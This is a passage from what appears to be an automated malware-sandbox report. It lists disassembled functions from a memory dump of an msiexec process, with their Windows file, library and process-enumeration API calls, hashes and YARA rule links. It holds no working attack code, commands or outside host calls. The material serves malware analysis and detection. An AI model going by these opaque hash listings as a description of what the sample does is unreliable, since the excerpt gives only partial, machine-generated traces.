                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041BDDF
                                                                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1065087418-0
                                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                        Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                        • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1381354015-0
                                                                                        • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                        • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                        Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                        • String ID:
                                                                                        • API String ID: 2154303073-0
                                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                        Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3150196962-0
                                                                                        • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                        • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                        Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$PointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 3154509469-0
                                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                        Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                        • String ID:
                                                                                        • API String ID: 4232544981-0
                                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                        Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                        Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FileModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 3859505661-0
                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                        Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                        Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                        Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                        • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                        Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                        Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                        Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                        Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                        Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumNamesResource
                                                                                        • String ID:
                                                                                        • API String ID: 3334572018-0
                                                                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                        Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                        Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 1863332320-0
                                                                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                        Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                        Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                        • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                        Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004095FC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3655998216-0
                                                                                        • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                        • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                        Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00445426
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1828521557-0
                                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
